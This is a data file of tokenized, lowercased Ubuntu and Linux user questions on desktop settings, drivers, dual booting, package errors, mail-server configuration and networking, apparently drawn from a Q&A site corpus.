279263	change font color of inactive apps on kde taskbar	how can i set minimized apps ' names on taskbar ( they call it taskmanager widget in kde i believe , that panel at the bottom ) not to be gray ? ie where can i change its font , in system settings i can change colors of inactive titlebars , but there is nothing for changing taskbar colors . i once got an answer ( minimize windows without them going black and white ) however it is not the answer for this question . it only allowed me to change icons color , not the font color . the names in gray are unreadable on most wallpapers on my screen .
279269	how to enable switching hybrid intel/ati with mux on ubuntu 12.04 ?	i have notebook with hybrid intel/ati hd5650 graphic ( with mux ) . i want to install previous kernel 2.6.35 like on ubuntu 10.10 because on that kernel a can switch my graphic without any problem with driver from ati webpage version 10.7 ( if my memory does n't wrong ) . can i do it ? how ? i 've looked at several webpages but there are no solution for mux hybrid graphic ( manually switching ) maybe from this post can help for developing switching graphic adaptable from ubuntu 10.10 to ubuntu 12.04 .
279270	why does umount automatically remove the mount point of a drive that has been mounted with a file manager ?	if i mount a drive using the file manager ( i 'm using pcmanfm ) , the mount point is automatically removed when i run the umount command . however , if i mount by running mkdir and then mount , i have to manually remove the mount point after i have run umount . why does this happen ? is there a way to mount the drive using the mount command that will make the mount point be automatically removed ? update : is it similar to the reason for this ?
279275	dual boot problem windows 8 & ubuntu 12.04	i have installed ubuntu 12.04 on my laptop with windows 8 pre-installed . but when selecting windows 8 to boot i get following error : error : unknown command 'drivemap' error : invalid efi filepath i ran boot-repair more than once . the output can be found here : http : //paste.ubuntu.com/5689718/ hope you can help me .
279276	looking for a screen monitoring program for a high school computer lab	as the title says , i 'm looking for a screen monitoring program for a high school computer lab that works with either mint 14 or lubuntu 12.04 . i ca n't seem to find anything in the software repositories and everything i find through internet searches is a paid program . does anyone have suggestions on a free and accessible program that i could use ?
279277	macbook pro 9,2 , ubuntu 12.10 , wifi works after suspend but not after reboot	i 'm running ubuntu 12.10 on a macbook pro 9,2 ( mid-2012 ) . i was able to successfully install and configure wifi using these instructions . great ! however , when i reboot , the wireless card is recognized , but no wireless networks are detected . that is , however , until i close the lid and the computer is suspended . when i reopen the lid , networks are detected normally . here is the output from dmesg | greb b43 : [ 20.542046 ] b43-phy0 : broadcom 4331 wlan found ( core revision 29 ) [ 20.681680 ] registered led device : b43-phy0 : :tx [ 20.681697 ] registered led device : b43-phy0 : :rx [ 20.681714 ] registered led device : b43-phy0 : :radio [ 22.563187 ] b43-phy0 : loading firmware version 666.2 ( 2011-02-23 01:15:07 ) [ 299.971510 ] b43-phy0 : loading firmware version 666.2 ( 2011-02-23 01:15:07 ) here is the output from lspci | grep bcm : 01:00.0 ethernet controller : broadcom corporation netxtreme bcm57765 gigabit ethernet pcie ( rev 10 ) 01:00.1 sd host controller : broadcom corporation netxtreme bcm57765 memory card reader ( rev 10 ) 02:00.0 network controller : broadcom corporation bcm4331 802.11a/b/g/n ( rev 02 ) and b43 is included in my /etc/modules . any suggestions ? thank you .
279280	how to automatically expand location with file open dialog ?	background by default , the `` file open '' dialog resembles : problem more often than not , my first interaction with this dialog is to click the pencil icon to reveal the path . i then paste the path from my terminal window ( pwd ) , which is often many times faster than clicking around within the open dialog to get to the same path . question how do you make the location input field in the `` file open '' dialog always be displayed , regardless of the application ( e.g. , gimp , inkscape , and other applications ) ? related how do i set the default sort order in open file dialog to `` name '' ?
279281	can a printer user code be entered in the printer settings gui ?	i managed to get my ubuntu laptop to do wifi printing at the university in australia where i study , i was told that only windows using only internet explorer can print ( not even mac ) as they have a web interface that you use to select the available printer and then it installs the printer network settings etc through internet explorer . well , i managed to use the add printer gui to search their printer hosting server for available printers after it prompted me to login using samba when i entered the server site name ( without https ) , the list came up and i selected the printer i needed . i then went through the list to pick the model etc which i got from the printer 's network path as its name was the model number . its a ricoh aficio mp c3300 this printer needs a user code unique to each person printing , the ppd file gives the settings gui standard 4 digit user codes like 1001 , 1002 , 1003 etc , i had to hard code my extra code into the ppd file to choose it from the gui . there is a customusercode or similar in the ppd file , surely the printer settings gui can be modified for one to set your own unique user code ? i have emailed the university 's library with all instructions i used to get this working and i let them know it may work for macs so at least that should get them to look into it as macs are becoming quite popular .
279285	why .profile ( and not .bashrc ) appends ~/bin to path ?	since .bashrc is more `` generic '' ( in the sense that .profile sources it ) , why `` include ~/bin to path '' procedure is not inside .bashrc ? why the user would not want it in a non-login shell ? ( especially nowadays , where non-login shells are more common* . ) i know i can manually do such change , but i want to know if there is a reason . *ca n't prove it , but i think that is the case .
279287	program to list application shortcut keys	i 'm looking for a ( k ) ubuntu alternative to cheatsheet or keycue or dashkards ( all these programs are osx only ) . can anyone help ?
279294	how to recover root user	i have accidentally changed the root user from administrator type to basic type in the user account page , and now i have no whatever root previligaes on the system , how i can switch back to administrator type ?
279297	ubuntu 12.04 x86 not recognizing multiple video cards w/ catalyst driver ( radeon hd 7950 x4 )	i have tried getting my 4 video cards operational using catalyst drivers , and have thusfar been unsuccessful . the seemingly most effective method has been using the built in `` additional drivers '' pop-up after the 12.04 install , although i ca n't get my 3 other cards to work with my mining rig ( one of four works ) . i have tried installing catalyst 12.8 , 12.10 , and 12.6 manually ( download , unzip , buildpkg , dpkg ) and they usually have me in a `` low resolution mode '' on reboot . my xorg.conf appears to be correct , although i think that i get a funny response from : $ cat /proc/ati/ ? /interrupt_info device : pci:5:0:0 kernel : 0 asyncio : 0 device : pci:6:0:0 kernel : 0 asyncio : 0 device : pci:3:0:0 kernel : 597359 asyncio : 0 device : pci:4:0:0 kernel : 0 asyncio : 0 i 've tried dummy plugs , and they do n't seem to help either .
279304	how to remove orphaned files and residues	i 'm using 12.04 lts . after uninstalling unwanted packages using purge and autoremove commands i still have orphaned files in system / home directory ( configuration and cache files mostly ) . just to make it clear used synaptic to clean the residual configurations , which removed the listed packages but some of the uninstalled package left various directories across system . is there a way how to completely get rid of those unwanted files ? i 'm not fan of janitor and bleechbit type of software and consider it somehow dangerous , but do not want to bloat my system with files i do not need anymore . used fslint which looks good for a duplicate files but fails to find residues and similar files . any suggestions ?
279305	wine install problem	$ sudo apt-get install wine [ sudo ] password for hergul : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.4 but it is not going to be installed e : unable to correct problems , you have held broken packages . and : $ sudo apt-get install wine wine1.4 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.4 : depends : wine1.4-i386 ( = 1.4-0ubuntu4.1 ) e : unable to correct problems , you have held broken packages . and : $ sudo apt-get install wine wine1.4 wine1.4-i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.4-i386 : i386 : depends : libglib2.0-0 : i386 ( > = 2.16.0 ) but it is not going to be installed depends : libgphoto2-2 : i386 ( > = 2.4.10.1 ) but it is not going to be installed depends : libgstreamer-plugins-base0.10-0 : i386 ( > = 0.10.22 ) but it is not going to be installed depends : libgstreamer0.10-0 : i386 ( > = 0.10.26 ) but it is not going to be installed recommends : gettext : i386 but it is not going to be installed recommends : libfontconfig1 : i386 but it is not going to be installed or libfontconfig : i386 recommends : libsane : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . and $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . and $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . i have tried to install with synaptic and aptitude install but it did not . ubuntu 12.04 x64
279306	setting an admin user via the gui - command line equivalent ?	to designate a user as an administrator from the gui , you can simply open-up that user 's properties and select the account type as the `` administrator '' option . if the user already exists , what effect does selecting this account type have at the system level ? ( added to sudo group , modification to /etc/passwd or /etc/sudoers ... etc ) and how would i accomplish this ( designating a user as an `` administrator '' ) from the command line ?
279320	how can i change exim4 config from warn on no reverse dns to actively rejecting mails with no reverse dns	by default exim4 only warns about mails with no reverse dns . i need to block and actively reject mail which has no reverse dns . i am willing to accept that it 's possible that some legit mail will be blocked , however , so far the only mail with no reverse dns has been spam . below is the code for reverse dns checking from the exim4 config . how do i change this from warn to blocking . # warn if the sender host does not have valid reverse dns . # # if your system can do dns lookups without delay or cost , you might want # to enable this . # if sender_host_address is defined , it 's a remote call . if # sender_host_name is not defined , then reverse lookup failed . use # this instead of ! verify = reverse_host_lookup to catch deferrals # as well as outright failures . .ifdef check_rcpt_reverse_dns reverse dnsreverse dnswarn condition = $ { if and { { def : sender_host_address } { ! def : sender_host_name } } \ { yes } { no } } add_header = x-host-lookup-failed : reverse dns lookup failed for $ sender_host_address ( $ { if eq { $ host_lookup_failed } { 1 } { failed } { deferred } } ) .endif
279324	windows to ubuntu via rdp : mounting local drives ?	as some of you may know , rdp in windows allows the client to make its drives available to the host or target machine . i have done that with no problems in the case of windows-windows and linux-windows ( rdesktop ) , but i ca n't seem to find a way to do it for windows-linux . am i missing something ?
279325	can not access windows 8 drive from ubuntu	i am dual booting windows 8 and ubuntu ... i finally got them both working my problem is i can not see my windows drive from ubuntu ... .i can see it listed with i open up nautilus ... but when i click on on it i get an error and can not read it how do i fix this ... .what did i do wrong in my install that would give me a mounting error i have another dual boot machine and that machine mounted the windows drive automatically
279327	how to uninstall `` liveusb '' package ?	i 've installed the liveusb programme using the deb file . what is the best way to remove the installer as i can not find it in the software centre ; is it just a python programme that can be deleted ?
279329	wifi connected but no internet , is this the end ?	this is my story : i left my laptop at home connected to the router and with teamviewer on . remotely i was controlling it about 2 hours , at a specific moment the connection has disapeared . when i came back , the laptop was on and still connected to the router but no internet connection . the router is fine , if i connect another device it works . i still can see other wifi networks and try to connect to them . i was not installing anything new software on it while controlling it remotely . nobody touched it . it was not a power failure , everything was like i left it . tried with a life cd , same situation ubuntu 12.10 on acer aspire 7730 ifconfig : wlan0 link encap : ethernet hwaddr 00:16 : ea : a4:17:52 inet addr:192.168.1.109 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :216 : eaff : fea4:1752/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:15 errors:0 dropped:0 overruns:0 frame:0 tx packets:48 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4910 ( 4.9 kb ) tx bytes:13172 ( 13.1 kb ) iwconfig : wlan0 ieee 802.11abgn essid : '' real+ '' mode : managed frequency:2.422 ghz access point : 00:18 : e7 : fa:7f:5f bit rate=58.5 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-36 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:35 missed beacon:0 route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 ping -c4 173.194.70.113 : ping 173.194.70.113 ( 173.194.70.113 ) 56 ( 84 ) bytes of data . ^c -- - 173.194.70.113 ping statistics -- - 4 packets transmitted , 0 received , 100 % packet loss , time 3023ms interesting the default gateway ping works , ping 192.168.1.1 : ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.1.1 : icmp_req=1 ttl=64 time=3.05 ms 64 bytes from 192.168.1.1 : icmp_req=2 ttl=64 time=6.23 ms ^c -- - 192.168.1.1 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 1001ms rtt min/avg/max/mdev = 3.051/4.644/6.237/1.593 ms lspci -nn | grep 0280 : 07:00.0 network controller [ 0280 ] : intel corporation wifi link 5100 [ 8086:4232 ] is this a bad new and i have to buy a new wifi card ?
279332	how can i remove the gray boxes around custom folder icons ?	when i set custom folder icons in ubuntu 13.04 , gray boxes appear around them : how can i make the icons just look normal ?
279343	how do i fix my broken/damaged kubuntu installation ?	( i am dual booting windows 8 and kubuntu . ) i 've been having a lot of fun with kubuntu . i 've done a lot with it , including installing gnome desktop , just to try it out . one day i was in steam and i wanted to install tf2 , and steam told me i did n't have enough disk space . so silly old me booted with a live usb into gparted and expanded the ext4 partition . well , now i ca n't boot into kubuntu . grub was giving me an error that i unfortunately ca n't remember anymore . i used boot-repair to fix it , but now i can only boot into windows . can i fix this , or should i just delete the kubuntu partition and start over ? i have tried holding down left shift at boot and escape .
279345	how do i upload a .css file to launchpad	i am trying to upload a framework.css file to launchpad with the following command : dput ppa : blade19899/framework.css framework.css_2.0_source.changes but according to this answer source.changes file is a file generated by debuild -s. my question is : how do i upload a non debian file ( a .css file ) to launchpad ?
279349	machine when to sleep while updating , process seems stuck	i let software updater do its thing earlier this morning , and the machine suspended after the ordinary 20 minutes . after having resumed , it 's stuck on `` preconfiguring packages , '' and the relevant processes do n't seem to be using the cpu . should i kill the process ? restart ? some combination thereof ?
279351	software updater stuck on applying changes	i 'm on 13.04 and i 'm downloading the update to beta but its stuck on applying changes . the other night i left it on all night came back and it was still on applying changes . what can i do now ? right now it 's still on applying changes
279352	finding a process 's filename from its pid ?	i 'm trying to figure out what program keeps killing the network indicator : $ nm-applet ** message : applet now removed from the notification area ** message : pid 31340 ( we are 28924 ) sent signal 15 , shutting down ... the pids change every time . is there a way to use that pid to find the name of the process that 's stopping it ?
279353	lubuntu 12.10 asks for super user before prompting for wifi password	i have installed lubuntu 12.10 on an hp mini netbook , which required the bcwm source package for wifi to work . ( somehow standard ubuntu did n't need it but it was too resource hungry for the netbook . ) everything is working fine but as soon as i try to connect to a new wifi network , i am asked for the root password , as in a gksu prompt . i am fine with that , but the final user of the netbook is n't quite happy with it . any ideas on how to make it ask for the wifi password only ?
279356	how to set up sublime text 2 as environment variable sublime	i just installed sublime text 2 on ubuntu 12.10 and would like to be able to run it as its own environment variable . example $ sublime somefile.js how do i add custom variables ?
279361	dual booting with windows 7 and ubuntu 12.04 and partitioning	i have a current setup on my desktop pc using windows 7 32bit currently , i have 2 partitions c : for system files and programs installed d : here are all files such as videos , songs , ebook , etc what i 'm planning to do is to dual boot with ubuntu 12.04 i 'm new to linux , so please bear with me . : ) i have some questions that really confuse me . i 'm planning on having a clean install and dualbooting windows 7 and ubuntu 12.04 my questions are : what 's the best partition setup for a clean install of windows 7 and later on dual boot it with ubuntu 12.04 ? do i need to have a separate partition for files on windows such as drive d : or just create a media partition that can be shared by both os ? if i do create a media partition would n't i have any conflicts in the long run ? if ever i create a /boot partition would i make it primary or logical ? is there an order to follow in creating partition ? for ex . do i have to put the /boot partition before / ( root ) partition ? where should i install the bootloader of ubuntu , so that when computer boots you have to choose between windows 7 and ubuntu 12.04 . sorry , if i 'll ask all my questions all at once . thanks in advance .
279362	how do i set a network bridge to have an mtu of 9000 ?	i have to gigabit network interfaces which i have bridged . /etc/network/interfaces is : auto lo iface lo inet loopback # set up interfaces manually , avoiding conflicts with , e.g. , network manager iface eth0 inet manual iface eth1 inet manual # bridge setup auto br0 iface br0 inet static bridge_ports eth0 eth1 address 192.168.88.2 broadcast 192.168.88.255 netmask 255.255.255.0 gateway 192.168.88.254 dns-nameservers 192.168.88.254 but the mtu is only 1500 myth @ myth : ~ $ traceroute -- mtu 192.168.88.1 traceroute to 192.168.88.1 ( 192.168.88.1 ) , 30 hops max , 65000 byte packets 1 robostation.local ( 192.168.88.1 ) 0.278 ms f=1500 0.279 ms 0.287 ms if i run the following commands : myth @ myth : ~ $ sudo ifconfig eth0 mtu 9000 myth @ myth : ~ $ sudo ifconfig eth1 mtu 9000 myth @ myth : ~ $ traceroute -- mtu 192.168.88.1 traceroute to 192.168.88.1 ( 192.168.88.1 ) , 30 hops max , 65000 byte packets 1 robostation.local ( 192.168.88.1 ) 0.407 ms f=9000 0.422 ms 0.383 ms now i have mtu of 9000 and transfers to my nas are much faster but , i thought i would just do this in the /etc/network/interfaces file : auto lo iface lo inet loopback # set up interfaces manually , avoiding conflicts with , e.g. , network manager iface eth0 inet manual mtu 9000 iface eth1 inet manual mtu 9000 # bridge setup auto br0 iface br0 inet static bridge_ports eth0 eth1 address 192.168.88.2 broadcast 192.168.88.255 netmask 255.255.255.0 gateway 192.168.88.254 dns-nameservers 192.168.88.254 mtu 9000 but the network just fails to come up at boot i removed the mtu 9000 from the br0 section and the pc boots with the network coming up , but the mtu is still 9000 how do i set the mtu to 9000 for eth0 and eth1 at boot so the bridge runs at 9000 ? also is there a way to test /etc/network/interfaces without rebooting all the time ?
279363	flexible vector construction in tcsh	vector generation is a technique which allows us to generate lists without defining iterators and write loops . they are useful in many situations , and can turn code to much more succinct and compact . they also facilitate quick composition of more complex constructs via command expansion . here 's an example : i have a program which operates on multiple host arguments . i need to generate a list of host names which have a sequential number embedded in them , e.g : a1z a2z a3z a4z a5z in bash one can write : $ progname a { 1..5 } z which will expand to : $ progname a1z a2z a3z a4z a5z in tcsh , which lacks this useful argument vector-generation feature , we can sometimes use seq . unfortunately , seq is limited to numbers only . man seq says that seq supports a -- format argument , but it does n't seem to do the really useful thing ( allowing arbitrary formats including a number ) . instead it only supports changing the floating-point format of a number alone ( a pity ) . of course , we can delegate the expansion to bash + echo using both command expansion and quoting of the full bash -c argument : tcsh > progname `bash -c `` echo a { 1..5 } z '' ` similarly , we could delegate the string vector generation to big utilities like awk , perl , python , lisp , or r using `` ( command expansion ) . the question is : are there any other simple ways to generate such vectors in tcsh . by 'simple ' i mean a small utility like seq , or even better , a built-in shell construct , and without resorting to writing loops or delegating the vector generation to `` big '' programs like bash/awk/clisp/perl/python/r ?
279365	how can i kill/close an 'orphaned ' window ?	i 've been running some python scripts to graph some stuff and occasionally i 'll lose track of what windows it spawned and just kill it with ^z . however , unlike in windows , the associated windows do n't die ; they stick around and can not be closed . these windows seem clueless ; they do n't redraw after being minimized or resized . i 'm new to the linux env so i ca n't fully articulate what 's going on , but in any event , how do i get rid of these zombie-orphan-hobo windows ?
279371	deferred : name server host name lookup failure ( smart host )	am using the sendmail to send an email and configure it as the following : /etc/mail/sendmail.mc define ( `smart_host ' , `smtp-server ' ) dnl define ( `relay_mailer_args ' , `tcp $ h 587 ' ) define ( `confauth_mechanisms ' , `external gssapi digest-md5 cram-md5 login plain ' ) dnl feature ( `authinfo ' , `hash /etc/mail/authinfo ' ) dnl /etc/mail/authinfo authinfo : smtp-server `` u : username @ host.com '' `` p : password '' `` m : plain '' after that i run the following command : $ m4 sendmail.mc > sendmail.cf $ makemap hash authinfo < authinfo $ /etc/init.d/sendmail restart and test it with : /usr/sbin/sendmail -v mabdalmahdi @ gmail.com < body.txt but still cant receive any email ? ? and i got the following error deferred : name server : smtp-server-name : host name lookup failure < br > i tried i can ping to the smtp server , and i run the command dig smpt-server-name i cant see any thing wrong ... why i got this message and cant revise an email .
279378	is there some way to add stormcloud to startup application ?	i 'm enjoing a lot stormcloud , the downside is that it does n't have a `` startup '' option so sometimes i forget to use it . is there some way to add it to the startup applications ?
279382	change lxde desktop context menu	i am currently running on lxde , and i 'm curious as to whether there is a way to change the context menu when right clicking the desktop . i 'd like to replace xterm with lxterminal . is there a config i should change for this ? edit : for clarification , to enable the window manager context menu , you have to visit desktop settings- > advanced , and click the checkbox for enabling the window manager menu .
279384	why did usb stop working suddenly ?	i tried to connect an amazon kindle ( as i do everyday ) to my 3rd . usb port , as the other two are always busy with mouse and keyboard . when i connected the device , the computer froze and i eventually had to boot the hard way . however , when i reloaded ubuntu , the all three usb ports were n't woking anymore . they wo n't respond when i connect mouse/keyboard/kindle/massive storage device or whatever , although the ports still provide power ( mouse light is on and massive storage device vibrates as if it were working ) . what can i do with that ? i am using a 6-month-old samsung rv511 , even though i am not sure if it matters all . thanks in advance !
279387	ubuntu update failure , broken operaing system . how to roll back update ?	ubuntu updates just broke the operating system , it now fails to recognise the monitor and its display resolutions ; how do i roll back this update ?
279390	how come the override_dh_build-indep sequence is n't run by debuild ?	i 'm having a bad time trying to generate some documentation for a shared library within debian/rules . i asked a question earlier about which target to use for generating the documentation . my problem now is that the target override_dh_build-indep is n't being built when i run debuild . i inserted an echo statement at the top of the % target and discovered that debuild builds the following targets : clean build install it would seem that build-indep is n't even being built . am i missing something ?
279391	quantal backported kernel in 12.04.2 ? what 's going on there ?	i 'm sure that i 'm not the first and/or only one to notice that 12.04.2 , released earlier this year , installs by default a backported 3.5 kernel from the quantal ( 12.10 ) release . i 'm surprised to see this in an lts version , so i was wondering what 's the reason for this ? it 's the first time i noticed it on an lts release . also : is there a method to upgrade to that or will i have to select manually that package ( linux-image-generic-lts-quantal ) ? comparing two fully updated systems originally installed with 12.04.1 installation cd $ lsb_release -d & & dpkg -l|grep linux-image|grep ^ii description : ubuntu 12.04.2 lts ii linux-image-3.2.0-39-generic 3.2.0-39.62 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-40-generic 3.2.0-40.64 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-generic 3.2.0.40.48 generic linux kernel image originally installed with 12.04.2 installation cd $ lsb_release -d & & dpkg -l|grep linux-image|grep ^ii description : ubuntu 12.04.2 lts ii linux-image-3.5.0-23-generic 3.5.0-23.35~precise1 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-3.5.0-27-generic 3.5.0-27.46~precise1 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-generic-lts-quantal 3.5.0.27.34 generic linux kernel image $ apt-cache show linux-image-generic-lts-quantal package : linux-image-generic-lts-quantal priority : optional section : metapackages installed-size : 27 maintainer : ubuntu kernel team < kernel-team @ lists.ubuntu.com > architecture : amd64 source : linux-meta-lts-quantal version : 3.5.0.27.34 depends : linux-image-3.5.0-27-generic , linux-firmware filename : pool/main/l/linux-meta-lts-quantal/linux-image-generic-lts-quantal_3.5.0.27.34_amd64.deb size : 2520 md5sum : c9ad82fa12aacbd14324283cb9344ea9 sha1 : a2f9a758f605c116865b7c7fa6971bf77364bf62 sha256 : 08133998d027b5af18e2e3374e0723b4cf22baab28850cc89ca327a34b3094df description-en : generic linux kernel image this package will always depend on the latest generic 12.10 kernel image available . description-md5 : c7e4fbc023632f2e538ff93b600ef34c bugs : https : //bugs.launchpad.net/ubuntu/+filebug origin : ubuntu supported : 18m
279395	how to increase performance of booting ?	i am experiencing slow booting sequence from 12.10 . only chromium browser is selected for startup and it does enable automatically under startup applications . i try to restart and it may take 15 seconds to complete booting sequence . before , it was much faster . any suggestion to increase booting performance ?
279397	after quitting vim show the original text in vim	either quitting vim or ctrl-z vim , should display the content and not display the previous commands in xterm . i am pretty sure it 's a vimrc setting and not xresources setting but ca n't remember ... thanks .
279399	ubuntu x86 or x64 with laptop specs ?	hi there i just wondering wich one would i choose ? this are mi laptop specs : toshiba satellite l305-s5937 intel pentium processor t3400 ( dual core ) 4gb pc6400 ddr2 800mhz sdram 320gb hdd ( 5400rpm , serial ata ) mobile intel graphics media accelerator 4500m 128mb-1342mb dynamically allocated shared graphics memory ( it came originaly with windows vista 64-bits )
279407	how to disable microphone from auto adjusting it 's input volume	i want to disable the way the microphone lowers itself depending on the input . here is an image : the microphone started at 100 % and slowly started to drop to where the image is showing . this is because of either a background noise or the user raising their voice . in any case , i would like to prohibit this behavior because when it gets too low , the need to raise the voice will be actually needed . so is there an option or configuration file where one can edit and change this behavior ? this is not related to only one app but several , ranging from skype to google hangouts , empathy to teamspeak and more . so please no answers mentioning only one app if the solution does not solve the problem for others . the pulseaudio app ( gui and terminal ) was already used . alsamixer was also used . in both cases , adjusting the microphone level did not help . the auto adjust always happens when anyone speaks , does not even need to be someone speaking loud , they just need to speak and after a couple of seconds the mic level will start auto adjusting . i repeat , this is not a 1 app problem but several , so a common solution is better than a 1 for each app ( which we are talking about more than 50 apps ) .
279408	mail server : system requirements	i want to create a mail server for personal use . it will be used mainly by me and possibly some family members . the system load will be in the order of 5-10 imap mailboxes , all for `` human '' use : no heavy traffic , `` corporate '' massive usage or spamming . i 'd like to use this stack : ubuntu 12.04 x64 exim ( would anyone suggest postfix ? i 'm after lightness and simplicity ) dovecot clamav something to filter spam ( suggestions ? ) mailman ( maybe ) i would rather not install other things on this machine . for example , i 'm not planning to install apache or mysql ( or any other dbdaemon ) if i can avoid it . ( system health stuff like unattended_upgrades will be present , though . ) i also know about sudo tasksel install mail-server , but i prefer doing things myself : - ) my question is : what kind os system usage should i expect ? what kind of machine would i need ? i was considering amazon ec2 , either : t1.micro : 613 mib of memory , up to 2 ecus ( for short periodic bursts ) , ebs storage only m1.small : 1.7 gib of memory , 1 ec2 compute unit ( 1 virtual core with 1 ec2 compute unit ) , 160 gb of local instance storage about dbs . i 'm not experienced with mail server software ( i 'm still studying the documentation ) , and i 'd appreciate some quick advice on whether a db integration is really needed . i read of people using mysql for exim configuration . i do have a remote mysql dedicated machine , but i 'd rather use a local flat file like sqlite . would that be possible or even needed ? a final point : i 'm planning to setup roundcube as a webmail client on another apache-php server . any suggestions on that ? cheers
279409	any app that tells me to take regular breaks from working ?	various health reports indicate that sitting for too long working on the computer is not good for health . i need an app that can tell me to take a break , for example once every hour of continuous work . it would be optimal if it can automatically detect how long it has been since my display was last unlocked or logged in and count from that time . when i take a break , i will lock the display and unlock it when i 'm back . is there any such app for ubuntu which help the user take regular breaks ?
279412	does vim support unicode ?	i recently changed my system language to tamil ( a language used in india ) from english . while i was enjoying ubuntu in tamil , my favorite editor vim has run into an issue because of the system language change , it seems . how can i fix this ?
279413	firefox installation error in kubuntu 12.10	i keep getting this error : package : /var/cache/apt/archives/firefox_20.0+build1-0ubuntu0.12.10.3_amd64.deb error : trying to overwrite '/usr/share/applications/firefox.desktop ' , which is also in package kubuntu-firefox-installer 12.04ubuntu1 i am only trying to install firefox as a browser . interestingly , it will not let me remove the `` firefox installer '' either . any suggestions ?
279421	how can i install qt 5.x on 12.04 lts ?	if you want to develop with qml 2.0 and qt5 , the base packages do n't seem to exist in repository for 12.04 . what ppa should i add ? is it a binary installer ? a compile the toolkit yourself ? those are n't separate questions , they 're just possible tracks to an answer . i 'm asking because if you want to develop for ubuntu phone , but still have a rock solid lts development box , this seems the appropriate path . how can i install qt 5.x on 12.04 lts ?
279428	installing mysql in lamp	i managed to install apache and php on my ubuntu installation , however when i try to install mysql using this command sudo apt-get install mysql-server it mentions that there are broken packages . any ideas on what i should have done , but havenâ´t possibly done ?
279430	unrar files spanned across multiple dvds	i am just starting to get the hang of ubuntu , so please bear with me . i want to extract a rar file of size 8gb . now i have backed up the file on 2 dvds after splitting the files in 40 pieces of 200mb each ; first disc has 21 parts and second disc has the rest . when i start extraction , it extracts 21 parts , but after that archive manager throws an error can not find the volume : archivename.part22.rar i understand that the problem is archive manager is not showing a dialog to find the other files on the next disc . i can counter it by just copying the all parts from the disk in one directory before extracting , but copying 8gb of data every time i want to extract anything is very time consuming , takes a lot of space on my small hard drive , and i have many such archives . can anyone point me to some other program that can do the same ? i googled but found nothing , nor any other solution . i am using ubuntu 12.10
279431	how to encrypt sensitive info on exec line in .desktop shortcut ?	one of my custom shortcut has auto login parameter along with my login credential in clear text on the exec line . is there trick how to write the login details portion in encrypted form and make ubuntu prompts for password or something to decrypt it when i launch the shortcut ?
279434	2 computers , 1 with ubuntu and a wireless problem	okay so , there are 2 computers in my house ( apartments ) , one desktop and one laptop ( mine , the issue ) . the desktop is brand new , my fiancee uses it daily and it runs windows 8 ; mine is running ubuntu 12.04 lts with gnome shell installed . the windows computer is plugged into the modem and gets it 's internet from that , but my laptop gets it wirelessly , which is the problem . here 's a little back story : i had windows 7 installed not even 5 days ago and the wireless was working fine . the only time my laptop did n't have internet was when the other computer was n't getting it either ( which was rare ) . but after installing ubuntu ( before and after tinkering ( adding drivers , gnome shell , my apps , etc . ) ) , it cuts in and out every few minutes ; though it can last a while , it is n't predictable . i 've looked up ways to fix it and none seem feasible to me , though it could just be my inexperience with this sort of thing . if specs are needed , i 'm gon na need someone to tell me how , as that 's how little i know about this . any help would be appreciated at this point , i really do n't want to go back to windows but right now it looks like it 's the only option . i 'll wait a while for replies but if i ca n't fix it soon i may need to stop trying to use ubuntu altogether . any help is appreciated . thanks in advance . edit : i 've noticed two things since posting this , one is that even when my computer is plugged in to the ethernet , my internet is still cutting out ; and two is that when i 'm online ( i use google chrome ) i get a error saying that there was a problem , that usually but does n't always appear underneath my web browser window after it fails to connect to the dns server .
279439	where can i suggest spell check improvements ?	i 've been surprised by some of the words that applications in ubuntu think deserve a red underline . how can i contribute to ubuntu to by improving the spell checking in its applications ?
279446	i have installed linux version of matlab but being new i have no idea how to run it . there is no exec file as in windows	i have executable matlab in bin/glnx86 folder . what is the next step ?
279447	ssh via corkscrew - where is the config ?	i 've read this page : http : //www.ubuntugeek.com/how-to-use-ssh-via-http-proxy-using-corkscrew-in-ubuntu.html and it tells me to open up the ssh config file , which was in 2008 , located in `` ~/.ssh/config '' well , it was not a recognized path at all , and the file did n't exist . so , where can i find this file now in 2013 ? i am sure there are made changes , and if anyone know , i would appreciate that thanks ! best regards
279452	how to keep keyboard settings using setxkbmap across reboot ?	searching the forum , i found the following to add hebrew support for lubuntu ( typing in hebrew ) : setxkbmap -option grp : switch , grp : alt_shift_toggle , grp_led : scroll us , il the problem is that after i reboot my computer , it does n't work anymore and i have to type it again . suggestions ?
